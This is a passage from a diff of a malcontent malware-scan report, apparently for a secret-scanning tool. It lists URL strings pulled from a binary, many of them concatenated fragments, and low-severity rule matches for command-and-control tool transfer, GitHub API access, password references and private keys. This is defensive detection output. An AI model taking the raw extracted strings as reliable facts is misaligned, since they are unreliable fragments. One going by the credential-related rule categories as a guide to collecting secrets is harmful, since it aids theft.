[https://api.refiner.io/v1/identify](https%3A%2F%2Fapi.refiner.io%2Fv1%2Fidentify)
[https://api.scrapestack.com/scrape](https%3A%2F%2Fapi.scrapestack.com%2Fscrape)
[https://api.sirv.com/v2/tokenSlack](https%3A%2F%2Fapi.sirv.com%2Fv2%2FtokenSlack)
[https://api.stripe.com/v1/invoices](https%3A%2F%2Fapi.stripe.com%2Fv1%2Finvoices)
[https://api.stripe.com/v1/products](https%3A%2F%2Fapi.stripe.com%2Fv1%2Fproducts)
[https://api.unplu.gg/forecasthttps](https%3A%2F%2Fapi.unplu.gg%2Fforecasthttps)
[https://api.veriphone.io/v2/verify](https%3A%2F%2Fapi.veriphone.io%2Fv2%2Fverify)
[https://app.codacy.com/api/v3/user](https%3A%2F%2Fapp.codacy.com%2Fapi%2Fv3%2Fuser)
[https://app.posthog.com/api/event/](https%3A%2F%2Fapp.posthog.com%2Fapi%2Fevent%2F)
[https://boostnote.io/api/docshttps](https%3A%2F%2Fboostnote.io%2Fapi%2Fdocshttps)
[https://gitlab.com/org/repo.gitAWS](https%3A%2F%2Fgitlab.com%2Forg%2Frepo.gitAWS)
[https://holidayapi.com/v1/holidays](https%3A%2F%2Fholidayapi.com%2Fv1%2Fholidays)
[https://managedhsm.azure.net/https](https%3A%2F%2Fmanagedhsm.azure.net%2Fhttps)
[https://management.azure.com/https](https%3A%2F%2Fmanagement.azure.com%2Fhttps)
[https://payments.sandbox.braintree](https%3A%2F%2Fpayments.sandbox.braintree)
[https://rest.nexmo.com/account/get](https%3A%2F%2Frest.nexmo.com%2Faccount%2Fget)
[https://servicebus.azure.net/https](https%3A%2F%2Fservicebus.azure.net%2Fhttps)
[https://www.humanity.com/api/v2/me](https%3A%2F%2Fwww.humanity.com%2Fapi%2Fv2%2Fme)
[http://www.topografix.com/GPX/1/1](http%3A%2F%2Fwww.topografix.com%2FGPX%2F1%2F1)
[https://api.craftmypdf.com/v1/get](https%3A%2F%2Fapi.craftmypdf.com%2Fv1%2Fget)
[https://api.dovico.com/Employees/](https%3A%2F%2Fapi.dovico.com%2FEmployees%2F)
[https://api.elevenlabs.io/v1/user](https%3A%2F%2Fapi.elevenlabs.io%2Fv1%2Fuser)
[https://api.getgist.com/contacts/](https%3A%2F%2Fapi.getgist.com%2Fcontacts%2F)
[https://api.github.com/repos/exec](https%3A%2F%2Fapi.github.com%2Frepos%2Fexec)
[https://api.juro.com/v3/templates](https%3A%2F%2Fapi.juro.com%2Fv3%2Ftemplates)
[https://api.kickbox.com/v2/verify](https%3A%2F%2Fapi.kickbox.com%2Fv2%2Fverify)
[https://api.mapbox.com/tokens/v2/](https%3A%2F%2Fapi.mapbox.com%2Ftokens%2Fv2%2F)
[https://api.meaningcloud.com/lang](https%3A%2F%2Fapi.meaningcloud.com%2Flang)
[https://api.noticeable.io/graphql](https%3A%2F%2Fapi.noticeable.io%2Fgraphql)
[https://api.opsgenie.com/v2/users](https%3A%2F%2Fapi.opsgenie.com%2Fv2%2Fusers)
[https://api.plivo.com/v1/Account/](https%3A%2F%2Fapi.plivo.com%2Fv1%2FAccount%2F)
[https://api.rawg.io/api/platforms](https%3A%2F%2Fapi.rawg.io%2Fapi%2Fplatforms)
[https://api.razorpay.com/v1/items](https%3A%2F%2Fapi.razorpay.com%2Fv1%2Fitems)
[https://api.scraperbox.com/scrape](https%3A%2F%2Fapi.scraperbox.com%2Fscrape)
[https://api.stripe.com/v1/balance](https%3A%2F%2Fapi.stripe.com%2Fv1%2Fbalance)
[https://api.stripe.com/v1/coupons](https%3A%2F%2Fapi.stripe.com%2Fv1%2Fcoupons)
[https://api.stripe.com/v1/payouts](https%3A%2F%2Fapi.stripe.com%2Fv1%2Fpayouts)
[https://api.stripe.com/v1/tax_ids](https%3A%2F%2Fapi.stripe.com%2Fv1%2Ftax_ids)
[https://api.tomorrow.io/v4/alerts](https%3A%2F%2Fapi.tomorrow.io%2Fv4%2Falerts)
[https://api.verimail.io/v3/verify](https%3A%2F%2Fapi.verimail.io%2Fv3%2Fverify)
[https://api.webscrapingapi.com/v1](https%3A%2F%2Fapi.webscrapingapi.com%2Fv1)
[https://apilayer.net/api/validate](https%3A%2F%2Fapilayer.net%2Fapi%2Fvalidate)
[https://app.workstack.io/api/team](https%3A%2F%2Fapp.workstack.io%2Fapi%2Fteam)
[https://convier.me/api/eventhttps](https%3A%2F%2Fconvier.me%2Fapi%2Feventhttps)
[https://dev.azuresynapse.nethttps](https%3A%2F%2Fdev.azuresynapse.nethttps)
[https://eu.posthog.com/api/event/](https%3A%2F%2Feu.posthog.com%2Fapi%2Fevent%2F)
[https://files.stripe.com/v1/files](https%3A%2F%2Ffiles.stripe.com%2Fv1%2Ffiles)
[https://grafana.com/api/v1/tokens](https%3A%2F%2Fgrafana.com%2Fapi%2Fv1%2Ftokens)
[https://graph.microsoft.com/https](https%3A%2F%2Fgraph.microsoft.com%2Fhttps)
[https://huggingface.co/api/whoami](https%3A%2F%2Fhuggingface.co%2Fapi%2Fwhoami)
[https://id.twitch.tv/oauth2/token](https%3A%2F%2Fid.twitch.tv%2Foauth2%2Ftoken)
[https://newsapi.org/v2/everything](https%3A%2F%2Fnewsapi.org%2Fv2%2Feverything)
[https://ps.pndsn.com/signal/https](https%3A%2F%2Fps.pndsn.com%2Fsignal%2Fhttps)
[http://s3.amazonaws.com/doc/2006](http%3A%2F%2Fs3.amazonaws.com%2Fdoc%2F2006)
[http://www.w3.org/2001/XMLSchema](http%3A%2F%2Fwww.w3.org%2F2001%2FXMLSchema)
[https://api.cloze.com/v1/profile](https%3A%2F%2Fapi.cloze.com%2Fv1%2Fprofile)
[https://api.companyhub.com/v1/me](https%3A%2F%2Fapi.companyhub.com%2Fv1%2Fme)
[https://api.findl.com/v1.0/query](https%3A%2F%2Fapi.findl.com%2Fv1.0%2Fquery)
[https://api.getbeamer.com/v0/url](https%3A%2F%2Fapi.getbeamer.com%2Fv0%2Furl)
[https://api.gitter.im/v1/user/me](https%3A%2F%2Fapi.gitter.im%2Fv1%2Fuser%2Fme)
[https://api.gyazo.com/api/images](https%3A%2F%2Fapi.gyazo.com%2Fapi%2Fimages)
[https://api.intercom.io/contacts](https%3A%2F%2Fapi.intercom.io%2Fcontacts)
[https://api.livestorm.co/v1/ping](https%3A%2F%2Fapi.livestorm.co%2Fv1%2Fping)
[https://api.loganalytics.iohttps](https%3A%2F%2Fapi.loganalytics.iohttps)
[https://api.proxycrawl.com/leads](https%3A%2F%2Fapi.proxycrawl.com%2Fleads)
[https://api.rentman.net/filesAPI](https%3A%2F%2Fapi.rentman.net%2FfilesAPI)
[https://api.serpstack.com/search](https%3A%2F%2Fapi.serpstack.com%2Fsearch)
[https://api.shipday.com/carriers](https%3A%2F%2Fapi.shipday.com%2Fcarriers)
[https://api.stripe.com/v1/events](https%3A%2F%2Fapi.stripe.com%2Fv1%2Fevents)
[https://api.stripe.com/v1/orders](https%3A%2F%2Fapi.stripe.com%2Fv1%2Forders)
[https://api.stripe.com/v1/prices](https%3A%2F%2Fapi.stripe.com%2Fv1%2Fprices)
[https://api.stripe.com/v1/topups](https%3A%2F%2Fapi.stripe.com%2Fv1%2Ftopups)
[https://api.swell.store/products](https%3A%2F%2Fapi.swell.store%2Fproducts)
[https://api.unsplash.com/photos/](https%3A%2F%2Fapi.unsplash.com%2Fphotos%2F)
[https://api.userstack.com/detect](https%3A%2F%2Fapi.userstack.com%2Fdetect)
[https://campayn.com/api/v1/lists](https%3A%2F%2Fcampayn.com%2Fapi%2Fv1%2Flists)
[https://coinlib.io/api/v1/global](https%3A%2F%2Fcoinlib.io%2Fapi%2Fv1%2Fglobal)
[https://data.fixer.io/api/latest](https%3A%2F%2Fdata.fixer.io%2Fapi%2Flatest)
[https://database.cloudapi.de/not](https%3A%2F%2Fdatabase.cloudapi.de%2Fnot)
[https://datalake.azure.net/https](https%3A%2F%2Fdatalake.azure.net%2Fhttps)
[https://go.postman.co/folder/TLS](https%3A%2F%2Fgo.postman.co%2Ffolder%2FTLS)
[https://graph.microsoft.us/https](https%3A%2F%2Fgraph.microsoft.us%2Fhttps)
[https://runrun.it/api/v1.0/users](https%3A%2F%2Frunrun.it%2Fapi%2Fv1.0%2Fusers)
[https://www.apimatic.io/api/code](https%3A%2F%2Fwww.apimatic.io%2Fapi%2Fcode)
[https://www.zipcodeapi.com/rest/](https%3A%2F%2Fwww.zipcodeapi.com%2Frest%2F)
[http://earth.google.com/kml/2.0](http%3A%2F%2Fearth.google.com%2Fkml%2F2.0)
[http://earth.google.com/kml/2.1](http%3A%2F%2Fearth.google.com%2Fkml%2F2.1)
[http://earth.google.com/kml/2.2](http%3A%2F%2Fearth.google.com%2Fkml%2F2.2)
[https://api.airtable.com/v0/AWS](https%3A%2F%2Fapi.airtable.com%2Fv0%2FAWS)
[https://api.aiven.io/v1/project](https%3A%2F%2Fapi.aiven.io%2Fv1%2Fproject)
[https://api.chec.io/v1/products](https%3A%2F%2Fapi.chec.io%2Fv1%2Fproducts)
[https://api.column.com/entities](https%3A%2F%2Fapi.column.com%2Fentities)
[https://api.deepai.org/api/text](https%3A%2F%2Fapi.deepai.org%2Fapi%2Ftext)
[https://api.finage.co.uk/symbol](https%3A%2F%2Fapi.finage.co.uk%2Fsymbol)
[https://api.float.com/v3/people](https%3A%2F%2Fapi.float.com%2Fv3%2Fpeople)
[https://api.frame.io/v2/mehttps](https%3A%2F%2Fapi.frame.io%2Fv2%2Fmehttps)
[https://api.github.com/apphttps](https%3A%2F%2Fapi.github.com%2Fapphttps)
[https://api.lessannoyingcrm.com](https%3A%2F%2Fapi.lessannoyingcrm.com)
[https://api.moonclerk.com/forms](https%3A%2F%2Fapi.moonclerk.com%2Fforms)
[https://api.openuv.io/api/v1/uv](https%3A%2F%2Fapi.openuv.io%2Fapi%2Fv1%2Fuv)
[https://api.privacy.com/v1/card](https%3A%2F%2Fapi.privacy.com%2Fv1%2Fcard)
[https://api.sendgrid.comShopify](https%3A%2F%2Fapi.sendgrid.comShopify)
[https://api.stripe.com/v1/files](https%3A%2F%2Fapi.stripe.com%2Fv1%2Ffiles)
[https://app.paymoapp.com/api/me](https%3A%2F%2Fapp.paymoapp.com%2Fapi%2Fme)
[https://capi.tokeet.com/v1/user](https%3A%2F%2Fcapi.tokeet.com%2Fv1%2Fuser)
[https://fxmarketapi.com/apilive](https%3A%2F%2Ffxmarketapi.com%2Fapilive)
[https://gallery.azure.com/https](https%3A%2F%2Fgallery.azure.com%2Fhttps)
[https://graph.cloudapi.de/https](https%3A%2F%2Fgraph.cloudapi.de%2Fhttps)
[https://httpbin.org/anythingAPI](https%3A%2F%2Fhttpbin.org%2FanythingAPI)
[https://open.larksuite.com/open](https%3A%2F%2Fopen.larksuite.com%2Fopen)
[https://upload.pypi.org/legacy/](https%3A%2F%2Fupload.pypi.org%2Flegacy%2F)
[http://chunkednosniffCreatedIM](http%3A%2F%2FchunkednosniffCreatedIM)
[http://www.opengis.net/gml/3.2](http%3A%2F%2Fwww.opengis.net%2Fgml%2F3.2)
[http://www.opengis.net/kml/2.2](http%3A%2F%2Fwww.opengis.net%2Fkml%2F2.2)
[http://www.wencodeURIComponent](http%3A%2F%2Fwww.wencodeURIComponent)
[https://api.abyssale.com/ready](https%3A%2F%2Fapi.abyssale.com%2Fready)
[https://api.datadoghq.comhttps](https%3A%2F%2Fapi.datadoghq.comhttps)
[https://api.eu.sendgrid.comtag](https%3A%2F%2Fapi.eu.sendgrid.comtag)
[https://api.fastforex.io/fetch](https%3A%2F%2Fapi.fastforex.io%2Ffetch)
[https://api.flightapi.io/iata/](https%3A%2F%2Fapi.flightapi.io%2Fiata%2F)
[https://api.ipinfodb.com/v3/ip](https%3A%2F%2Fapi.ipinfodb.com%2Fv3%2Fip)
[https://api.mailjet.com/v4/sms](https%3A%2F%2Fapi.mailjet.com%2Fv4%2Fsms)
[https://api.mesibo.com/api.php](https%3A%2F%2Fapi.mesibo.com%2Fapi.php)
[https://api.pagar.me/1/balance](https%3A%2F%2Fapi.pagar.me%2F1%2Fbalance)
[https://api.scrapfly.io/scrape](https%3A%2F%2Fapi.scrapfly.io%2Fscrape)
[https://api.stripe.com/v1/skus](https%3A%2F%2Fapi.stripe.com%2Fv1%2Fskus)
[https://api.userflow.com/users](https%3A%2F%2Fapi.userflow.com%2Fusers)
[https://apilayer.net/api/check](https%3A%2F%2Fapilayer.net%2Fapi%2Fcheck)
[https://authn.nvidia.com/token](https%3A%2F%2Fauthn.nvidia.com%2Ftoken)
[https://coda.io/apis/v1/whoami](https%3A%2F%2Fcoda.io%2Fapis%2Fv1%2Fwhoami)
[https://cosmos.azure.comfailed](https%3A%2F%2Fcosmos.azure.comfailed)
[https://timezoneapi.io/api/ip/](https%3A%2F%2Ftimezoneapi.io%2Fapi%2Fip%2F)
[https://v2.convertapi.com/user](https%3A%2F%2Fv2.convertapi.com%2Fuser)
[https://www.appsynergy.com/api](https%3A%2F%2Fwww.appsynergy.com%2Fapi)
[http://www.w3.org/2002/07/owl](http%3A%2F%2Fwww.w3.org%2F2002%2F07%2Fowl)
[http://www.w3.org/TR/2001/REC](http%3A%2F%2Fwww.w3.org%2FTR%2F2001%2FREC)
[https://api.apify.com/v2/acts](https%3A%2F%2Fapi.apify.com%2Fv2%2Facts)
[https://api.cloverly.com/2019](https%3A%2F%2Fapi.cloverly.com%2F2019)
[https://api.github.comInclude](https%3A%2F%2Fapi.github.comInclude)
[https://api.logz.io/v2/whoami](https%3A%2F%2Fapi.logz.io%2Fv2%2Fwhoami)
[https://api.nylas.com/account](https%3A%2F%2Fapi.nylas.com%2Faccount)
[https://api.vyte.in/v2/events](https%3A%2F%2Fapi.vyte.in%2Fv2%2Fevents)
[https://google.comcrypto/ecdh](https%3A%2F%2Fgoogle.comcrypto%2Fecdh)
[https://graph.facebook.com/me](https%3A%2F%2Fgraph.facebook.com%2Fme)
[https://vpnapi.io/api/8.8.8.8](https%3A%2F%2Fvpnapi.io%2Fapi%2F8.8.8.8)
[http://Descriptionrelatively](http%3A%2F%2FDescriptionrelatively)
[https://api.documo.com/v1/me](https%3A%2F%2Fapi.documo.com%2Fv1%2Fme)
[https://api.etherscan.io/api](https%3A%2F%2Fapi.etherscan.io%2Fapi)
[https://api.jotform.com/user](https%3A%2F%2Fapi.jotform.com%2Fuser)
[https://api.linkpreview.net/](https%3A%2F%2Fapi.linkpreview.net%2F)
[https://api.openai.com/v1/me](https%3A%2F%2Fapi.openai.com%2Fv1%2Fme)
[https://api.roaring.io/token](https%3A%2F%2Fapi.roaring.io%2Ftoken)
[https://api.telegram.org/bot](https%3A%2F%2Fapi.telegram.org%2Fbot)
[https://api.webflow.com/info](https%3A%2F%2Fapi.webflow.com%2Finfo)
[https://github.com/google/go](https%3A%2F%2Fgithub.com%2Fgoogle%2Fgo)
[https://github.com/llvm/llvm](https%3A%2F%2Fgithub.com%2Fllvm%2Fllvm)
[https://huggingface.cofailed](https%3A%2F%2Fhuggingface.cofailed)
[https://sts.amazonaws.comnot](https%3A%2F%2Fsts.amazonaws.comnot)
[https://www.planyo.com/rest/](https%3A%2F%2Fwww.planyo.com%2Frest%2F)
[http://www.w3.org/2005/Atom](http%3A%2F%2Fwww.w3.org%2F2005%2FAtom)
[https://api.bscscan.com/api](https%3A%2F%2Fapi.bscscan.com%2Fapi)
[https://api.edamam.com/auto](https%3A%2F%2Fapi.edamam.com%2Fauto)
[https://api.figma.com/v1/me](https%3A%2F%2Fapi.figma.com%2Fv1%2Fme)
[https://api.geckoboard.com/](https%3A%2F%2Fapi.geckoboard.com%2F)
[https://api.github.com/2006](https%3A%2F%2Fapi.github.com%2F2006)
[https://api.heroku.com/apps](https%3A%2F%2Fapi.heroku.com%2Fapps)
[https://api.ip2location.io/](https%3A%2F%2Fapi.ip2location.io%2F)
[https://api.qase.io/v1/user](https%3A%2F%2Fapi.qase.io%2Fv1%2Fuser)
[https://api.twilio.com/2010](https%3A%2F%2Fapi.twilio.com%2F2010)
[https://api.typeform.com/me](https%3A%2F%2Fapi.typeform.com%2Fme)
[https://api.zenrows.com/v1/](https%3A%2F%2Fapi.zenrows.com%2Fv1%2F)
[https://cex.io/api/balance/](https%3A%2F%2Fcex.io%2Fapi%2Fbalance%2F)
[https://deliver.kontent.ai/](https%3A%2F%2Fdeliver.kontent.ai%2F)
[https://geocode.xyz/51.4647](https%3A%2F%2Fgeocode.xyz%2F51.4647)
[https://gitlab.com/Skipping](https%3A%2F%2Fgitlab.com%2FSkipping)
[https://jenkins.example.com](https%3A%2F%2Fjenkins.example.com)
[https://neutrinoapi.net/url](https%3A%2F%2Fneutrinoapi.net%2Furl)
[https://registry.npmjs.org/](https%3A%2F%2Fregistry.npmjs.org%2F)
[http://169.254.170.2/redis](http%3A%2F%2F169.254.170.2%2Fredis)
[http://www.w3.org/2000/svg](http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg)
[http://www.w3.org/shortcut](http%3A%2F%2Fwww.w3.org%2Fshortcut)
[https://api.podio.com/user](https%3A%2F%2Fapi.podio.com%2Fuser)
[https://api.scraperapi.com](https%3A%2F%2Fapi.scraperapi.com)
[https://api.tallyfy.com/me](https%3A%2F%2Fapi.tallyfy.com%2Fme)
[https://payments.braintree](https%3A%2F%2Fpayments.braintree)
[https://sts.amazonaws.com/](https%3A%2F%2Fsts.amazonaws.com%2F)
[http://localhost/truncate](http%3A%2F%2Flocalhost%2Ftruncate)
[http://ns.adobe.com/xfdf/](http%3A%2F%2Fns.adobe.com%2Fxfdf%2F)
[http://www.interpretation](http%3A%2F%2Fwww.interpretation)
[https://api.deno.com/user](https%3A%2F%2Fapi.deno.com%2Fuser)
[https://api.monday.com/v2](https%3A%2F%2Fapi.monday.com%2Fv2)
[https://api.shodan.io/api](https%3A%2F%2Fapi.shodan.io%2Fapi)
[https://collect2.com/api/](https%3A%2F%2Fcollect2.com%2Fapi%2F)
[https://github.com/dustin](https%3A%2F%2Fgithub.com%2Fdustin)
[http://mathematicsmargin](http%3A%2F%2Fmathematicsmargin)
[https://ecs.aliyuncs.com](https%3A%2F%2Fecs.aliyuncs.com)
[https://iamcredentials..](https%3A%2F%2Fiamcredentials..)
[https://pixabay.com/api/](https%3A%2F%2Fpixabay.com%2Fapi%2F)
[https://push.databox.com](https%3A%2F%2Fpush.databox.com)
[http://applicationslink](http%3A%2F%2Fapplicationslink)
[https://google.comhttps](https%3A%2F%2Fgoogle.comhttps)
[https://v6.exchangerate](https%3A%2F%2Fv6.exchangerate)
[http://html4/loose.dtd](http%3A%2F%2Fhtml4%2Floose.dtd)
[http://staticsuggested](http%3A%2F%2Fstaticsuggested)
[https://api.adzuna.com](https%3A%2F%2Fapi.adzuna.com)
[https://api.kucoin.com](https%3A%2F%2Fapi.kucoin.com)
[https://api.sheety.co/](https%3A%2F%2Fapi.sheety.co%2F)
[https://api.whoxy.com/](https%3A%2F%2Fapi.whoxy.com%2F)
[https://apple.comhttps](https%3A%2F%2Fapple.comhttps)
[https://dev.azure.com/](https%3A%2F%2Fdev.azure.com%2F)
[https://gitlab.comScan](https%3A%2F%2Fgitlab.comScan)
[https://www.bitmex.com](https%3A%2F%2Fwww.bitmex.com)
[http://iparticipation](http%3A%2F%2Fiparticipation)
[https://dummysite.com](https%3A%2F%2Fdummysite.com)
[https://staging.cloud](https%3A%2F%2Fstaging.cloud)
[http://www.language=](http%3A%2F%2Fwww.language%3D)
[https://commodities](https%3A%2F%2Fcommodities)
[https://foo.com/bar](https%3A%2F%2Ffoo.com%2Fbar)
[https://scrutinizer](https%3A%2F%2Fscrutinizer)
[http://interpreted](http%3A%2F%2Finterpreted)
[http://www.hortcut](http%3A%2F%2Fwww.hortcut)
[https://api.travis](https%3A%2F%2Fapi.travis)
[https://app.travis](https%3A%2F%2Fapp.travis)
[https://www.recent](https%3A%2F%2Fwww.recent)
[http://google.com](http%3A%2F%2Fgoogle.com)
[http://interested](http%3A%2F%2Finterested)
[http://navigation](http%3A%2F%2Fnavigation)
[http://www.C//DTD](http%3A%2F%2Fwww.C%2F%2FDTD)
[http://www.style=](http%3A%2F%2Fwww.style%3D)
[https://technical](https%3A%2F%2Ftechnical)
[https://www.World](https%3A%2F%2Fwww.World)
[http://according](http%3A%2F%2Faccording)
[http://encoding=](http%3A%2F%2Fencoding%3D)
[http://imEnglish](http%3A%2F%2FimEnglish)
[http://site_name](http%3A%2F%2Fsite_name)
[http://www.years](http%3A%2F%2Fwww.years)
[https://api.meta](https%3A%2F%2Fapi.meta)
[https://file.io/](https%3A%2F%2Ffile.io%2F)
[https://ossrdbms](https%3A%2F%2Fossrdbms)
[https://www.easy](https%3A%2F%2Fwww.easy)
[http://familiar](http%3A%2F%2Ffamiliar)
[http://www./div](http%3A%2F%2Fwww.%2Fdiv)
[http://www.icon](http%3A%2F%2Fwww.icon)
[http://www.text](http%3A%2F%2Fwww.text) | +| LOW | [c2/tool_transfer/arch](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/tool_transfer/arch.yara#arch_ref) | references a specific architecture | [https://](https%3A%2F%2F)
[http://](http%3A%2F%2F)
[x86_64](https://github.com/search?q=x86_64&type=code)
[AMD64](https://github.com/search?q=AMD64&type=code)
[amd64](https://github.com/search?q=amd64&type=code)
[arm64](https://github.com/search?q=arm64&type=code) | | LOW | [collect/code/github_api](https://github.com/chainguard-dev/malcontent/blob/main/rules/collect/code/github_api.yara#github_api_user) | access GitHub API | [google/go-github](https://github.com/search?q=google%2Fgo-github&type=code)
[api.github.com](https://github.com/search?q=api.github.com&type=code) | | LOW | [credential/password](https://github.com/chainguard-dev/malcontent/blob/main/rules/credential/password/password.yara#password) | references a 'password' | [Attribute SyntaxPassword must be changed](https://github.com/search?q=Attribute+SyntaxPassword+must+be+changed&type=code)
[nil ValueWriterpassword must not be set](https://github.com/search?q=nil+ValueWriterpassword+must+not+be+set&type=code)
[no username and password are provided](https://github.com/search?q=no+username+and+password+are+provided&type=code)
[requires old password authentication](https://github.com/search?q=requires+old+password+authentication&type=code)
[GetVerifiablePasswordAuthentication](https://github.com/search?q=GetVerifiablePasswordAuthentication&type=code)
[meetsCouchbasePasswordRequirements](https://github.com/search?q=meetsCouchbasePasswordRequirements&type=code)
[meetsSnowflakePasswordRequirements](https://github.com/search?q=meetsSnowflakePasswordRequirements&type=code)
[the ChangePassword query execution](https://github.com/search?q=the+ChangePassword+query+execution&type=code)
[username or password was specified](https://github.com/search?q=username+or+password+was+specified&type=code)
[verifiable_password_authentication](https://github.com/search?q=verifiable_password_authentication&type=code)
[json into Changepassword request](https://github.com/search?q=json+into+Changepassword+request&type=code)
[key is not password protectedssh](https://github.com/search?q=key+is+not+password+protectedssh&type=code)
[NewControlBeheraPasswordPolicy](https://github.com/search?q=NewControlBeheraPasswordPolicy&type=code)
[ControlVChuPasswordMustChange](https://github.com/search?q=ControlVChuPasswordMustChange&type=code)
[native_passwordinvalid dbname](https://github.com/search?q=native_passwordinvalid+dbname&type=code)
[qunexpected password response](https://github.com/search?q=qunexpected+password+response&type=code)
[CertificatePasswordvprotobuf](https://github.com/search?q=CertificatePasswordvprotobuf&type=code)
[in list of old passwordsldap](https://github.com/search?q=in+list+of+old+passwordsldap&type=code)
[old_passwordsRepositories to](https://github.com/search?q=old_passwordsRepositories+to&type=code)
[incorrect passwordrardecode](https://github.com/search?q=incorrect+passwordrardecode&type=code)
[ControlVChuPasswordWarning](https://github.com/search?q=ControlVChuPasswordWarning&type=code)
[dPassword Policy - Behera](https://github.com/search?q=dPassword+Policy+-+Behera&type=code)
[PasswordCredentialsToken](https://github.com/search?q=PasswordCredentialsToken&type=code)
[secure_settings_password](https://github.com/search?q=secure_settings_password&type=code)
[AllowCleartextPasswords](https://github.com/search?q=AllowCleartextPasswords&type=code)
[allowCleartextPasswords](https://github.com/search?q=allowCleartextPasswords&type=code)
[change_passwordsecurity](https://github.com/search?q=change_passwordsecurity&type=code)
[Elasticsearch password](https://github.com/search?q=Elasticsearch+password&type=code)
[GetCertificatePassword](https://github.com/search?q=GetCertificatePassword&type=code)
[PasswordHashIterations](https://github.com/search?q=PasswordHashIterations&type=code)
[SecureSettingsPassword](https://github.com/search?q=SecureSettingsPassword&type=code)
[- pairs with password](https://github.com/search?q=-+pairs+with+password&type=code)
[ChangePasswordOptions](https://github.com/search?q=ChangePasswordOptions&type=code)
[NewChangePasswordFunc](https://github.com/search?q=NewChangePasswordFunc&type=code)
[NewReaderWithPassword](https://github.com/search?q=NewReaderWithPassword&type=code)
[PasswordAuthenticator](https://github.com/search?q=PasswordAuthenticator&type=code)
[SASLprepping password](https://github.com/search?q=SASLprepping+password&type=code)
[sendEncryptedPassword](https://github.com/search?q=sendEncryptedPassword&type=code)
[socksUsernamePassword](https://github.com/search?q=socksUsernamePassword&type=code)
[username AND password](https://github.com/search?q=username+AND+password&type=code)
[AllowNativePasswords](https://github.com/search?q=AllowNativePasswords&type=code)
[ChangePasswordLength](https://github.com/search?q=ChangePasswordLength&type=code)
[ChangePasswordOffset](https://github.com/search?q=ChangePasswordOffset&type=code)
[KeychainPasswordFunc](https://github.com/search?q=KeychainPasswordFunc&type=code)
[authRequiresPassword](https://github.com/search?q=authRequiresPassword&type=code)
[certificate_password](https://github.com/search?q=certificate_password&type=code)
[password_change_date](https://github.com/search?q=password_change_date&type=code)
[Pairs with password](https://github.com/search?q=Pairs+with+password&type=code)
[certificatePassword](https://github.com/search?q=certificatePassword&type=code)
[mongoPasswordDigest](https://github.com/search?q=mongoPasswordDigest&type=code)
[scrambleOldPassword](https://github.com/search?q=scrambleOldPassword&type=code)
[AllowEmptyPassword](https://github.com/search?q=AllowEmptyPassword&type=code)
[PasscodeInPassword](https://github.com/search?q=PasscodeInPassword&type=code)
[PasswordRegexCheck](https://github.com/search?q=PasswordRegexCheck&type=code)
[for ChangePassword](https://github.com/search?q=for+ChangePassword&type=code)
[passwordattachment](https://github.com/search?q=passwordattachment&type=code)
[AllowOldPasswords](https://github.com/search?q=AllowOldPasswords&type=code)
[PasswordEprotobuf](https://github.com/search?q=PasswordEprotobuf&type=code)
[allowOldPasswords](https://github.com/search?q=allowOldPasswords&type=code)
[parseUserPassword](https://github.com/search?q=parseUserPassword&type=code)
[winvalid password](https://github.com/search?q=winvalid+password&type=code)
[FilePasswordFunc](https://github.com/search?q=FilePasswordFunc&type=code)
[errEmptyPassword](https://github.com/search?q=errEmptyPassword&type=code)
[scramblePassword](https://github.com/search?q=scramblePassword&type=code)
[PasswordChanged](https://github.com/search?q=PasswordChanged&type=code)
[encryptPassword](https://github.com/search?q=encryptPassword&type=code)
[GetVCSPassword](https://github.com/search?q=GetVCSPassword&type=code)
[PasswordModify](https://github.com/search?q=PasswordModify&type=code)
[changepassword](https://github.com/search?q=changepassword&type=code)
[empty password](https://github.com/search?q=empty+password&type=code)
[manglePassword](https://github.com/search?q=manglePassword&type=code)
[password-store](https://github.com/search?q=password-store&type=code)
[Password from](https://github.com/search?q=Password+from&type=code)
[password_hash](https://github.com/search?q=password_hash&type=code)
[stripPassword](https://github.com/search?q=stripPassword&type=code)
[passwordFunc](https://github.com/search?q=passwordFunc&type=code)
[passworduser](https://github.com/search?q=passworduser&type=code)
[saltPassword](https://github.com/search?q=saltPassword&type=code)
[vcs_password](https://github.com/search?q=vcs_password&type=code)
[GetPassword](https://github.com/search?q=GetPassword&type=code)
[PasswordSet](https://github.com/search?q=PasswordSet&type=code)
[passwordSet](https://github.com/search?q=passwordSet&type=code)
[passwordf](https://github.com/search?q=passwordf&type=code) | | LOW | [credential/ssl/private_key](https://github.com/chainguard-dev/malcontent/blob/main/rules/credential/ssl/private_key.yara#private_key_val) | References private keys | [private_key](https://github.com/search?q=private_key&type=code)
[privateKey](https://github.com/search?q=privateKey&type=code)
[privatekey](https://github.com/search?q=privatekey&type=code) | @@ -116,7 +116,7 @@ | LOW | [data/compression/zstd](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/compression/zstd.yara#zstd) | Zstandard: fast real-time compression algorithm | [ZSTD_decompressStream](https://github.com/search?q=ZSTD_decompressStream&type=code)
`$magic_bytes`
`$decompress`
`$ref`
[zstd](https://github.com/search?q=zstd&type=code) | | LOW | [data/embedded/pem_certificate](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/embedded/embedded-pem-certificate.yara#begin_cert) | Contains embedded PEM certificate | [--BEGIN CERTIFICATE--](https://github.com/search?q=--BEGIN+CERTIFICATE--&type=code) | | LOW | [data/encoding/base64](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/encoding/base64.yara#b64) | Supports base64 encoded strings | [base64](https://github.com/search?q=base64&type=code) | -| LOW | [data/encoding/int](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/encoding/int.yara#js_parseInt) | parses integers | [parseInt(](https://github.com/search?q=parseInt%28&type=code) | +| LOW | [data/encoding/int](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/encoding/int.yara#js_parseInt) | parses integers | [parseInt\(](https://github.com/search?q=parseInt%28&type=code) | | LOW | [data/encoding/json](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/encoding/json.yara#encoding_json) | Supports JSON encoded objects | [encoding/json](https://github.com/search?q=encoding%2Fjson&type=code) | | LOW | [data/encoding/json_decode](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/encoding/json-decode.yara#jsondecode) | Decodes JSON messages | [json.Unmarshal](https://github.com/search?q=json.Unmarshal&type=code)
